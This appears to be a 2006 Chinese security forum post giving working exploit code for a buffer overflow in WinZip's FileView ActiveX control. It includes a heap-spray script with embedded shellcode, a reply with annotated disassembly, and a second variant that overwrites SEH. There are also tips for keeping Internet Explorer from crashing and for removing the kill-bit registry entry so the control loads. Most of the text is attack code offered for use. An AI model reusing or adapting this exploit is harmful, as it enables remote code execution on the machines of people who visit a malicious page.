winzip FileView ActiveX Controls CreateNewFolderFromName溢出exploit

来源:Ph4nt0m
作者: hahar

之前看到过一个FileView ActiveX控件溢出的漏洞,不过不是这个函数,网上公布的溢出代码也不是很好用。
这个是CreateNewFolderFromName函数的溢出,不过由于之前那个漏洞的问题,微软似乎已经禁用了这个控件(即 kill bit),
测试时可以删除下面的注册表项:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A09AE68F-B14D-43ED-B713-BA413F034904}]
"Compatibility Flags"=dword:00000400
元旦快乐!

</body>
</html>
<head>
<object classid="clsid:{A09AE68F-B14D-43ED-B713-BA413F034904}" id="winzip">
</object>
</head>

<body>

<SCRIPT language="javascript">
/*
---===[ winzip-exploit.html

XiaoHui : 76693223[at]163.com
HomePage: <a href="http://www.nipc.org.cn" target="_blank">www.nipc.org.cn</a>
(c) 2006 All rights reserved.
note: Because of the prior vuln in the FileView ActiveX Control, Microsoft has disabled this ActiveX Control (kill bit).
To test this vuln, you can delete the key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A09AE68F-B14D-43ED-B713-BA413F034904}]
"Compatibility Flags"=dword:00000400
I have tested the exploit on Windows 2000+sp4(CN), Windows xp+sp2(CN) and Winzip 10.0(6667); you can try
other versions, good luck~
]===---
*/

// Proof-of-concept layout from the post: the address the spray below is laid
// out to reach. Everything in this block only builds strings in memory; the
// ActiveX Compatibility kill bit (Compatibility Flags 0x400) quoted above
// stops IE from loading the control at all, which is the mitigation.
var heapSprayToAddress = 0x0d0d0d0d;

// %u-escaped payload. As reproduced here the literal is broken across several
// lines (an extraction artifact of the page), so it does not parse verbatim.
var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%

u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%

u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%

u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

// Size of each sprayed block, in bytes.
var heapBlockSize = 0x400000;

// JS strings are UTF-16, so the byte size is twice the character count.
var payLoadSize = payLoadCode.length * 2;

// Filler per block: block size minus the payload and a 0x38-byte allowance
// (presumably allocation overhead; nothing on this page pins it down).
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

// Two-character seed that getSpraySlide() (defined below) grows to
// spraySlideSize bytes.
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);

// Number of blocks needed to reach the address above (implicit global).
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

// Implicit global; the array keeps every block referenced.
memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

// Trigger: a 231-character run of 'A' plus the short literal suffix below,
// handed to the control's method. The control accepts a string of any
// length; the disassembly analysis later on this page shows the copy into
// its fixed stack buffer carries no bounds check, which is the defect
// being demonstrated.
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="x0dx0dx0dx0d";
winzip.CreateNewFolderFromName(xh);
/**
 * Grows `spraySlide` by repeated self-concatenation until its UTF-16 byte
 * length (2 bytes per character) reaches `spraySlideSize`, then cuts it to
 * `spraySlideSize/2` characters. substring() truncates a fractional index,
 * so an odd size rounds down by one character. An empty seed never
 * terminates the loop.
 * @param {string} spraySlide - seed string (a couple of characters here)
 * @param {number} spraySlideSize - wanted size in bytes
 * @returns {string} the filler string
 */
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

</script>

</body>
</html>

刺 的回帖:
分析了一下:

03F03938 55 PUSH EBP
03F03939 8BEC MOV EBP,ESP
03F0393B 81EC 70020000 SUB ESP,270 ; 0x270 bytes of locals; the path buffer filled below starts at [EBP-110]
03F03941 53 PUSH EBX
03F03942 56 PUSH ESI
03F03943 8BF1 MOV ESI,ECX
03F03945 33DB XOR EBX,EBX
03F03947 57 PUSH EDI
03F03948 8B86 3C030000 MOV EAX,DWORD PTR DS:[ESI+33C] ; member at +33C decides which branch fills the path buffer
03F0394E 3BC3 CMP EAX,EBX
03F03950 74 58 JE SHORT wzfilvw.03F039AA ; null -> special-folder branch
03F03952 68 08080200 PUSH 20808 ; UNICODE "ExplorerIEXPLORE.EXE"
03F03957 8D8D 90FDFFFF LEA ECX,DWORD PTR SS:[EBP-270]
03F0395D 68 60010000 PUSH 160
03F03962 51 PUSH ECX
03F03963 BF 00000040 MOV EDI,40000000
03F03968 53 PUSH EBX
03F03969 50 PUSH EAX
03F0396A 89BD 98FDFFFF MOV DWORD PTR SS:[EBP-268],EDI
03F03970 FF15 C0E3F303 CALL DWORD PTR DS:[<&SHELL32.SHGetFileIn>; SHELL32.SHGetFileInfoA
03F03976 85BD 98FDFFFF TEST DWORD PTR SS:[EBP-268],EDI
03F0397C 0F84 7D010000 JE wzfilvw.03F03AFF
03F03982 FFB6 48030000 PUSH DWORD PTR DS:[ESI+348]
03F03988 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
03F0398E 50 PUSH EAX
03F0398F 68 00800000 PUSH 8000
03F03994 FFB6 3C030000 PUSH DWORD PTR DS:[ESI+33C]
03F0399A FFB6 44030000 PUSH DWORD PTR DS:[ESI+344]
03F039A0 E8 4CA80000 CALL wzfilvw.03F0E1F1 ; internal routine, receives the [EBP-110] buffer; contract not shown here
03F039A5 83C4 14 ADD ESP,14
03F039A8 EB 38 JMP SHORT wzfilvw.03F039E2
03F039AA 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C]
03F039AD 50 PUSH EAX
03F039AE 53 PUSH EBX
03F039AF FFB6 D0010000 PUSH DWORD PTR DS:[ESI+1D0]
03F039B5 FF15 CCE3F303 CALL DWORD PTR DS:[<&SHELL32.SHGetSpecia>; SHELL32.SHGetSpecialFolderLocation
03F039BB 85C0 TEST EAX,EAX
03F039BD 0F85 3C010000 JNZ wzfilvw.03F03AFF
03F039C3 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
03F039C9 50 PUSH EAX
03F039CA FF75 F4 PUSH DWORD PTR SS:[EBP-C]
03F039CD FF15 D0E3F303 CALL DWORD PTR DS:[<&SHELL32.SHGetPathFr>; SHELL32.SHGetPathFromIDListA ; writes the folder path into [EBP-110]
03F039D3 8B86 48030000 MOV EAX,DWORD PTR DS:[ESI+348]
03F039D9 FF75 F4 PUSH DWORD PTR SS:[EBP-C]
03F039DC 8B08 MOV ECX,DWORD PTR DS:[EAX]
03F039DE 50 PUSH EAX
03F039DF FF51 14 CALL DWORD PTR DS:[ECX+14]
03F039E2 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
03F039E8 50 PUSH EAX
03F039E9 E8 F2BA0100 CALL wzfilvw.03F1F4E0 ; presumably a strlen of the path: the result (EDI) is used as an index below
03F039EE 8BF8 MOV EDI,EAX
03F039F0 59 POP ECX
03F039F1 80BC3D EFFEFFFF>CMP BYTE PTR SS:[EBP+EDI-111],5C ; last char == '\' ?
03F039F9 74 14 JE SHORT wzfilvw.03F03A0F
03F039FB 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]
03F03A01 68 14FAF403 PUSH wzfilvw.03F4FA14
03F03A06 50 PUSH EAX
03F03A07 E8 F4B90100 CALL wzfilvw.03F1F400 ; presumably a strcat-style append (same routine as the overflowing call below)
03F03A0C 59 POP ECX
03F03A0D 47 INC EDI
03F03A0E 59 POP ECX
03F03A0F FF75 08 PUSH DWORD PTR SS:[EBP+8] ; the caller-supplied name; no length check on it anywhere in this function
03F03A12 8D843D F0FEFFFF LEA EAX,DWORD PTR SS:[EBP+EDI-110] ; destination = current end of the fixed-size path buffer
03F03A19 50 PUSH EAX
03F03A1A E8 E1B90100 CALL wzfilvw.03F1F400 ; overflow here: the append is unbounded, so a name longer than the room left in the buffer at [EBP-110] runs past it; the fix is to bound the copy to the remaining buffer space (or reject overlong names) before this call

修改了一下楼主(LZ)的核心代码,使得更加通用


</body>
</html>
<head>
<object classid="clsid:{A09AE68F-B14D-43ED-B713-BA413F034904}" id="winzip">
</object>
</head>

<body>

<SCRIPT language="javascript">

// Second poster's variant of the same proof-of-concept. `axis` is declared
// but never used in this listing.
var axis = 0xdeadbeef;

// Placeholder payload: "%uPut ..." is not a valid %u escape, so unescape()
// leaves the text unchanged and payLoadSize below reflects the placeholder.
var payLoadCode = unescape("%uPut Your Shellcode Here!");

// Address the spray is laid out to reach (lower than the first listing's).
var heapSprayToAddress = 0x0c010101;

// JS strings are UTF-16, so the byte size is twice the character count.
var payLoadSize = payLoadCode.length * 2;

// Two-character seed that get_SpraySlide() (defined below) grows to
// spraySlideSize bytes.
var spraySlide = unescape("%u9090%u9090");

// Size of each sprayed block, in bytes (smaller blocks than the first listing).
var heapBlockSize = 0x100000;

// Filler per block: block size minus the payload and a 0x38-byte allowance
// (presumably allocation overhead; nothing on this page pins it down).
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

spraySlide = get_SpraySlide(spraySlide,spraySlideSize);

// Number of blocks needed to reach the address above (implicit global).
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;

// Implicit global; the array keeps every block referenced.
memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

/**
 * Grows `spraySlide` by repeated self-concatenation until its UTF-16 byte
 * length (2 bytes per character) reaches `spraySlideSize`, then cuts it to
 * `spraySlideSize/2` characters. substring() truncates a fractional index,
 * so an odd size rounds down by one character. An empty seed never
 * terminates the loop.
 * @param {string} spraySlide - seed string (a couple of characters here)
 * @param {number} spraySlideSize - wanted size in bytes
 * @returns {string} the filler string
 */
function get_SpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

</script>

<script>
/**
 * Builds the trigger string and hands it to the control. Per the author's
 * note after the listing, the padding is carried out to 433 characters so
 * the result no longer depends on the length of the system folder path.
 * Defensive takeaway: the control's method accepts a caller-supplied string
 * of any length with no bounds check before the copy (see the disassembly
 * above); the kill bit referenced at the top of the page keeps the control
 * from loading.
 */
function fuck()
{
var xh = 'A';
while (xh.length < 243) xh+='A';
while (xh.length < 433)
xh+="\x0c\x0c\x0c\x0c";
winzip.CreateNewFolderFromName(xh);
}
</script>

<script>java script:fuck();</script>

</body>
</html>

因为这个漏洞也跟系统目录有关,而不同系统上的目录可能不一样,所以原来的方式不通用,故改为覆盖 SEH 的方式:让 xh 的值一路覆盖到 433 个字节,保证覆盖到 SEH。

在shellcode最后使用

add esp, 12ch
pop ebp
retn 1ch

可以恢复栈平衡,以达到不挂ie的效果。
另外 winzip 这个东西有时候会弹出个窗口。
PS:难怪我调试以前那个winzip的漏洞时触发不了,原来是被MS禁用了
